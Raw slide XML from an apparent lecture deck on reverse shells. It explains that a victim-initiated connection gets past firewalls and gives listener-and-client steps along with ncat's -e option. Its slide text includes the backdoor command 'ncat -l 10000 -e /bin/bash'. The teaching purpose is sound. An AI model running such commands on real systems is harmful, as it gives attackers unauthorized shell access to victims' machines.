              <a:t>: a shell command for Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4877106" y="0"/>
            <a:ext cx="4266894" cy="4795666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233981" y="1443726"/>
            <a:ext cx="643125" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Left-Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526033" y="927144"/>
            <a:ext cx="1263056" cy="1582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p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="243402" y="4512942"/>
            <a:ext cx="3506298" cy="282724"/>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1415"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FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t> -l 10000 -e /bin/bash    //</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>if create a backdoor in Linux</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TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="243402" y="153879"/>
            <a:ext cx="1527982" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start listener first</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771384" y="307768"/>
            <a:ext cx="169249" cy="5474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3189308" y="94789"/>
            <a:ext cx="1518549" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start Client second</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3948583" y="356399"/>
            <a:ext cx="928523" cy="1563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8379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Reverse Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A new type of backdoor</a:t>
            </a:r>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12512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Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Normal backdoor at victim’s PC needs to be activate by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim can setup a firewall to block the income connecting request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050"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388" y="3017399"/>
            <a:ext cx="4201191" cy="1646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8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Standard input/output/error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6338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bypass firewall?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firewall doesn’t block signals sent from victims</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let the victim sends the signal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let the attacker to listen to the signal</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5"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312" y="0"/>
            <a:ext cx="3828214" cy="15005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312" y="3222230"/>
            <a:ext cx="3828214" cy="1500507"/>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5913997" y="3315522"/>
            <a:ext cx="1973525" cy="1118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11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6361981" y="3007745"/>
            <a:ext cx="1269899" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reverse shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68611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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell definition</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse shell is getting the connection from the victim or target to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43087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shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="518479" y="2498702"/>
            <a:ext cx="6933259" cy="1280665"/>
            <a:chOff x="1220568" y="5449115"/>
            <a:chExt cx="16789969" cy="3719928"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="pasted-image.tif"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220568" y="6319169"/>
              <a:ext cx="2050617" cy="2050617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 201"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4531580" y="5705018"/>
              <a:ext cx="2210115" cy="1112535"/>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2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" dirty="0"/>
                <a:t>std input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 202"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4550624" y="7663240"/>
              <a:ext cx="2233407" cy="1023138"/>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2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400"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67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 204"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3321689" y="7804900"/>
              <a:ext cx="1079942" cy="355834"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Picture 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579816" y="6023612"/>
              <a:ext cx="5434477" cy="101603"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 32"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="6463892"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Picture 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="7937137"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>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7" name="Shape 214"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12117936" y="7804899"/>
              <a:ext cx="838107" cy="523630"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Shape 215"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8298014" y="6294553"/>
              <a:ext cx="2390972"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9" name="Shape 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8233576" y="8233479"/>
              <a:ext cx="2519848"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40" name="Shape 217"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8901674" y="5449115"/>
              <a:ext cx="569604" cy="526580"/>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dirty="0" err="1"/>
                <a:t>tcp</a:t>
              </a:r>
              <a:endParaRPr sz="2533" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Shape 218"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9012255" y="8642463"/>
              <a:ext cx="569604" cy="526580"/>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a:t>tcp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 219"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13351926" y="6095010"/>
              <a:ext cx="3841633" cy="1112535"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" dirty="0" smtClean="0"/>
                <a:t>puts </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600" dirty="0"/>
                <a:t>input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Shape 220"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13246136" y="7266129"/>
              <a:ext cx="4764401" cy="1112535"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" dirty="0" smtClean="0"/>
                <a:t>receive</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                <a:t> output</a:t>
              </a:r>
              <a:endParaRPr sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7256813" y="2779099"/>
            <a:ext cx="1017874" cy="653136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581185" y="3541811"/>
            <a:ext cx="641739" cy="506125"/>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200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7350303" y="3506829"/>
            <a:ext cx="830894" cy="506125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="67735" tIns="67735" rIns="67735" bIns="67735"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sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="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833" y="1135844"/>
            <a:ext cx="742539" cy="742539"/>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170958" y="1507114"/>
            <a:ext cx="2514875"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1185" y="1489141"/>
            <a:ext cx="2325165" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Let a victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a signal to activate the communication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>channel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5845441" y="1357407"/>
            <a:ext cx="2349732" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to a hidden communication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>channel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Straight Arrow Connector 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4454981" y="1507114"/>
            <a:ext cx="3084644"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554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561" y="1443726"/>
            <a:ext cx="3124747" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: program to execute after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>connection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>occurs., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>connecting STDIN and STDOUT to the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: a shell command for Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Left-Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317055" y="907409"/>
            <a:ext cx="1263056" cy="1582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p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="243402" y="4512942"/>
            <a:ext cx="3506298" cy="282724"/>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1415"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FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t> -l 10000 -e /bin/bash    //</a:t>
            </a:r>
            <a:r>
